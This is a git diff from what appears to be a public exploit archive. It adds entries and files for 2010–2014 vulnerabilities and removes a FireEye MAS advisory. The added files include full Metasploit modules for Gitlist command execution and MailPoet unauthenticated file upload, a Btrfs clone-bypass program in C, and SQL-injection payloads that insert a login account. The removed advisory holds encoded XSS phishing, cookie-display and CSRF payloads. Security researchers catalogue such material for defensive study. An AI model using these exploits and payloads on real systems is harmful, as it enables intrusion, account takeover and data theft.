diff --git a/files.csv b/files.csv index 584752014..3b4816867 100755 --- a/files.csv +++ b/files.csv @@ -30579,7 +30579,6 @@ id,file,description,date,author,platform,type,port 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 -33955,platforms/php/webapps/33955.txt,"FireEye Malware Analysis System (MAS) 6.4.1 - Multiple Vulnerabilities",2014-07-02,kmkz,php,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0 @@ -30610,3 +30609,24 @@ id,file,description,date,author,platform,type,port 33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 'signupconfirm.php' Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 +33988,platforms/php/remote/33988.txt,"PHP 5.x 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 +33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002 +33990,platforms/multiple/remote/33990.rb,"Gitlist Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 +33991,platforms/php/remote/33991.rb,"Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 +33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 +33993,platforms/php/webapps/33993.txt,"Planet Script 1.x 'idomains.php' Cross Site Scripting Vulnerability",2010-05-14,Mr.ThieF,php,webapps,0 +33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass Vulnerability",2010-05-17,SkuLL-HackeR,php,webapps,0 +33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x SQL Injection and HTML Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 +33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0 +33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 'download.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component 'ComntrNam' Parameter Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 'chatsmileys.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 +34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA 'list' Parameter Cross Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0 +34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0 +34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0 +34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 +34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 diff --git a/platforms/asp/webapps/33992.txt b/platforms/asp/webapps/33992.txt new file mode 100755 index 000000000..01bbfa683 --- /dev/null +++ b/platforms/asp/webapps/33992.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/40201/info + +Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Platnik 8.01.001 is affected; other versions may also be vulnerable. + +INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)-- +INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)-- +or 1=1-- \ No newline at end of file diff --git a/platforms/ios/webapps/33996.txt b/platforms/ios/webapps/33996.txt new file mode 100755 index 000000000..a158bddd4 --- /dev/null +++ b/platforms/ios/webapps/33996.txt @@ -0,0 +1,237 @@ +Document Title: +=============== +Photo Org WonderApplications v8.3 iOS - File Include Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1277 + + +Release Date: +============= +2014-07-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1277 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Product & Service Introduction: +=============================== +Create great photo albums and video diaries with PhotoOrg. Keep your photo album and video diary secured with passwords. +Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa, Flickr and MySpace with family, friends +and business associates. + +Photo Editor with the following ability: +-Over eleven photo effects +-Four different photo enhancer +-Rotate and flip photo +-Crop photo +-Change photo brightness +-Change photo Contrast +-Change photo saturation +-Change photo sharpness +-Draw on photo with different colors +-Write text on your photo +-Remove red eyes +-Whiten photo +-Remove blemish on photo + +Features: +-view your pictures and videos using your browser +-upload your picture and video using your browser +-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace +-upload multiple pictures to Facebook, Twitter, Flickr and MySpace +-Keep your photo and videos organized the way you like it +-Keep your photo and video secured with password +-copy your photo and video from anywhere and paste them into the application + + +( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official WonderApplications Photo Org v8.3 iOS web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-07-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +WonderApplications +Product: Photo Org L - iOS Mobile Application 8.3 + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official WonderApplications Photo Org v8.3 iOS web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `uploadMedia` (uploadfile) module. Remote attackers are able to inject +own files with malicious `filename` values in the `uploadMedia` POST method request to compromise the mobile web-application. The local +file/path include execution occcurs in the index file/folder list context next to the vulnerable name/path value. The attacker is able +to inject the local file request by usage of the available `wifi interface` for file exchange/share. + +Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute +different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to +inject is POST. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) +count of 7.1. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low +user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected +device component compromise. + + +Request Method(s): + [+] [POST] + +Vulnerable Service(s): + [+] WonderApplications - WiFi Share + +Vulnerable Module(s): + [+] uploadMedia + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File/Folder Dir Listing (http://localhost:[port-x]/) + + +Proof of Concept (PoC): +======================= +The local file inlcude web vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: WonderApplications (Photo & Video) - Index- & Sub-Categories + + +

WonderApplications

+abcde +
abcde
+
+abcdef <././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip"> +
+ + +--- Poc Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:8080/uploadMedia Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/uploadMedia] + POST-Daten: + POST_DATA[-----------------------------276732337522317 +Content-Disposition: form-data; name="file"; filename="././/var/mobile/Applications/[LOCAL FILE INCLUDE VULNERABILITY!].png.zip" +Content-Type: application/zip +- + +20:40:52.394[62ms][total 79ms] Status: 200[OK] +GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2874] Mime Type[text/html] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Response Header: + Connection[Keep-Alive] + Content-Type[text/html] + Content-Length[2874] + + + + +Reference(s): +http://localhost:8080/ +http://localhost:8080/uploadMedia +http://localhost:8080/var/mobile/Applications/ + + +Solution - Fix & Patch: +======================= +The local file include web vulnerability bug can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. +Encode also the filename value in the file dir listing of the index and sub categories. +Restrict the filename value name input and prevent executions by a secure file filter on upload extension or the name validation itself. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the filename value is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/local/34001.c b/platforms/linux/local/34001.c new file mode 100755 index 000000000..f5085efbb --- /dev/null +++ b/platforms/linux/local/34001.c @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/40241/info + +The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation. + +An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. + +#include +#include +#include +#include + +#define BTRFS_IOC_CLONE _IOW(0x94, 9, int) + +int main(int argc, char * argv[]) +{ + + if(argc < 3) { + printf("Usage: %s [target] [output]\n", argv[0]); + exit(-1); + } + + int output = open(argv[2], O_WRONLY | O_CREAT, 0644); + + /* Note - opened for writing, not reading */ + int target = open(argv[1], O_WRONLY); + + ioctl(output, BTRFS_IOC_CLONE, target); + +} diff --git a/platforms/multiple/remote/33990.rb b/platforms/multiple/remote/33990.rb new file mode 100755 index 000000000..cf79501e0 --- /dev/null +++ b/platforms/multiple/remote/33990.rb @@ -0,0 +1,119 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Gitlist Unauthenticated Remote Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated remote command execution vulnerability + in version 0.4.0 of Gitlist. The problem exists in the handling of an specially + crafted file name when trying to blame it. + }, + 'License' => MSF_LICENSE, + 'Privileged' => false, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Author' => + [ + 'drone', #discovery/poc by @dronesec + 'Brandon Perry ' #Metasploit module + ], + 'References' => + [ + ['CVE', '2014-4511'], + ['EDB', '33929'], + ['URL', 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/'] + ], + 'Payload' => + { + 'Space' => 8192, # max length of GET request really + 'BadChars' => "&\x20", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl', + } + }, + 'Targets' => + [ + ['Gitlist 0.4.0', { }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 30 2014' + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ], self.class) + end + + def check + repo = get_repo + + if repo.nil? + return Exploit::CheckCode::Unknown + end + + chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5)) + + res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode") + + if res && res.body + if res.body.include?(Rex::Text.decode_base64(chk)) + return Exploit::CheckCode::Vulnerable + elsif res.body.to_s =~ /sh.*not found/ + return Exploit::CheckCode::Vulnerable + end + end + + Exploit::CheckCode::Safe + end + + def exploit + repo = get_repo + if repo.nil? + fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository") + end + send_command(repo, payload.encoded) + end + + def get_repo + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "/") + }) + + unless res + return nil + end + + first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body) + + unless first_repo && first_repo.length >= 2 + return nil + end + + repo_name = first_repo[1] + + repo_name + end + + def send_command(repo, cmd) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`') + }, 1) + + res + end + +end \ No newline at end of file diff --git a/platforms/multiple/webapps/33995.txt b/platforms/multiple/webapps/33995.txt new file mode 100755 index 000000000..0b72b06e5 --- /dev/null +++ b/platforms/multiple/webapps/33995.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/40212/info + +Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may exploit the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks. + +The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Blaze Apps 1.4.0.051909 and prior are vulnerable. + +HTML Injection + + + +SQL Injection + +aa' OR [SQL] OR 'a'='1 + diff --git a/platforms/multiple/webapps/34000.txt b/platforms/multiple/webapps/34000.txt new file mode 100755 index 000000000..fd7a8ab9f --- /dev/null +++ b/platforms/multiple/webapps/34000.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40236/info + +Serialsystem is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Serialsystem 1.0.4 BETA is vulnerable; other versions may also be affected. + +http://www.example.com/Serials/upload/?list= \ No newline at end of file diff --git a/platforms/php/remote/33988.txt b/platforms/php/remote/33988.txt new file mode 100755 index 000000000..9f776fc24 --- /dev/null +++ b/platforms/php/remote/33988.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/40173/info + + +PHP is prone to multiple format-string vulnerabilities because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. + +Attackers can exploit these issues to run arbitrary code within the context of the PHP process. This may allow them to bypass intended security restrictions or gain elevated privileges. + +PHP 5.3 through 5.3.2 are vulnerable. + +$ php -r "fopen('phar:///usr/bin/phar.phar/*%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x','r');" \ No newline at end of file diff --git a/platforms/php/remote/33991.rb b/platforms/php/remote/33991.rb new file mode 100755 index 000000000..99850503a --- /dev/null +++ b/platforms/php/remote/33991.rb @@ -0,0 +1,143 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload', + 'Description' => %q{ + The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8 + is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme + functionality to upload a zip file containing the payload. The plugin used the + admin_init hook, which is also executed for unauthenticated users when accessing + a specific URL. The developers tried to fix the vulnerablility + in version 2.6.7 but the fix can be bypassed. In PHPs default configuration, + a POST variable overwrites a GET variable in the $_REQUEST array. The plugin + uses $_REQUEST to check for access rights. By setting the POST parameter to + something not beginning with 'wysija_', the check is bypassed. Wordpress uses + the $_GET array to determine the page and is so not affected by this. + }, + 'Author' => + [ + 'Marc-Alexandre Montpas', # initial discovery + 'Christian Mehlmauer' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ], + [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'], + [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 1 2014')) + end + + def create_zip_file(theme_name, payload_name) + # the zip file must match the following: + # -) Exactly one folder representing the theme name + # -) A style.css in the theme folder + # -) Additional files in the folder + + content = { + ::File.join(theme_name, 'style.css') => '', + ::File.join(theme_name, payload_name) => payload.encoded + } + + zip_file = Rex::Zip::Archive.new + content.each_pair do |name, content| + zip_file.add_file(name, content) + end + + zip_file.pack + end + + def check + readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt') + res = send_request_cgi({ + 'uri' => readme_url, + 'method' => 'GET' + }) + # no readme.txt present + if res.nil? || res.code != 200 + return Msf::Exploit::CheckCode::Unknown + end + + # try to extract version from readme + # Example line: + # Stable tag: 2.6.6 + version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1] + + # readme present, but no version number + if version.nil? + return Msf::Exploit::CheckCode::Detected + end + + print_status("#{peer} - Found version #{version} of the plugin") + + if Gem::Version.new(version) < Gem::Version.new('2.6.8') + return Msf::Exploit::CheckCode::Appears + else + return Msf::Exploit::CheckCode::Safe + end + end + + def exploit + theme_name = rand_text_alpha(10) + payload_name = "#{rand_text_alpha(10)}.php" + + zip_content = create_zip_file(theme_name, payload_name) + + uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php') + + data = Rex::MIME::Message.new + data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"") + data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"') + data.add_part('themeupload', nil, nil, 'form-data; name="action"') + data.add_part('Upload', nil, nil, 'form-data; name="submitter"') + data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"') + post_data = data.to_s + + payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name) + + print_status("#{peer} - Uploading payload to #{payload_uri}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' }, + 'data' => post_data + }) + + if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1' + fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + # Files to cleanup (session is dropped in the created folder): + # style.css + # the payload + # the theme folder (manual cleanup) + register_files_for_cleanup('style.css', payload_name) + + print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.") + + print_status("#{peer} - Executing payload #{payload_uri}") + res = send_request_cgi({ + 'uri' => payload_uri, + 'method' => 'GET' + }) + end +end \ No newline at end of file diff --git a/platforms/php/webapps/33955.txt b/platforms/php/webapps/33955.txt deleted file mode 100755 index 9013a183c..000000000 --- a/platforms/php/webapps/33955.txt +++ /dev/null @@ -1,87 +0,0 @@ -# Exploit Title: Fireeye Malware Analysis System multiple vulnerabilities -# Google Dork: none -# Date: 06/05/2014 -# Exploit Author: kmkz (Bourbon Jean-Marie) -# Vendor Homepage: http://www.fireeye.com/fr/fr/ -# Software Link: http://www.fireeye.com/products-and-solutions/ -# Version: 6.4.1 -# CVE : none - -************************************************************* -*[Audit Type] web IHM ONLY / Full black-box audit * -* * -*[Multiples Vulnerabilities] * -* * -* 3 XSS (reflected) * -* 1 CSRF * -* 1 NoSQLi (Json object) * -* 1 PostGreSQL SQLi (Exploitable?) * -* 1 File and Path Disclosure * -* 1 Source code Info-leak * -* * -************************************************************* - - - -[*] XSS: - +First XSS (reflected): - https://192.168.1.50/yara/show_ya_file?name= - PoC : - Redirection: - https://192.168.1.50/yara/show_ya_file?name= - Url encoded redirection payload: - https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.location%3D(String.fromCharCode(104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109))%3E%0A%09 - - Phishing page PoC: - https://192.168.1.50/yara/show_ya_file?name= - Url encoded phishing page payload: - https://192.168.1.50/yara/show_ya_file?name=%3Cbody%20onload%3Ddocument.write(String.fromCharCode(60%2C104%2C116%2C109%2C108%2C62%2C60%2C98%2C111%2C100%2C121%2C62%2C60%2C104%2C101%2C97%2C100%2C62%2C60%2C109%2C101%2C116%2C97%2C32%2C99%2C111%2C110%2C116%2C101%2C110%2C116%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C104%2C116%2C109%2C108%2C59%2C32%2C99%2C104%2C97%2C114%2C115%2C101%2C116%2C61%2C117%2C116%2C102%2C45%2C56%2C34%2C62%2C60%2C47%2C109%2C101%2C116%2C97%2C62%2C60%2C47%2C104%2C101%2C97%2C100%2C62%2C60%2C100%2C105%2C118%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C45%2C97%2C108%2C105%2C103%2C110%2C58%2C32%2C99%2C101%2C110%2C116%2C101%2C114%2C59%2C34%2C62%2C60%2C102%2C111%2C114%2C109%2C32%2C77%2C101%2C116%2C104%2C111%2C100%2C61%2C34%2C80%2C79%2C83%2C84%2C34%2C32%2C65%2C99%2C116%2C105%2C111%2C110%2C61%2C34%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C114%2C117%2C34%2C62%2C80%2C104%2C105%2C115%2C104%2C105%2C110%2C103%2C112%2C97%2C103%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C47%2C62%2C85%2C115%2C101%2C114%2C110%2C97%2C109%2C101%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C32%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C85%2C115%2C101%2C114%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C32%2C58%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C80%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C112%2C97%2C115%2C115%2C119%2C111%2C114%2C100%2C34%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C105%2C110%2C112%2C117%2C116%2C32%2C110%2C97%2C109%2C101%2C61%2C34%2C86%2C97%2C108%2C105%2C100%2C34%2C32%2C118%2C97%2C108%2C117%2C101%2C61%2C34%2C79%2C107%2C32%2C33%2C34%2C116%2C121%2C112%2C101%2C61%2C34%2C115%2C117%2C98%2C109%2C105%2C116%2C34%2C32%2C47%2C62%2C32%2C60%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E - +Second XSS (reflected): - https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E - +Third XSS (reflected): - https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E -Show Cookie PoC: - https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn - -[*] CSRF: - - PoC: - admin logout: - https://192.168.1.50/network/network?new_domain= - Url encoded admin deconnexion PoC: - https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E - Report deleting: - https://192.168.1.50/network/network?new_domain= - Url encoded report deleting Poc: - https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E -[*] SQLi PostGreSQL (Exploitable?): - https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2 -FROM events /** - - output: - Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved. -Couldn't find Event with id=9999 OR SELECT 1,2 FROM events - https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999 Output: - Event ID '99999999999' could not be retrieved. - PG::Error: ERROR: value "99999999999" is out of range for type -integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1 - - -[*] Files & Directory Disclosure: - https://192.168.1.50/malware_analysis/ma_repo : the Input Path field -allow Path & file disclosure ../../../../../../../bin/sh (example) - - -{*] Others: - 1)No SQLi (Json) 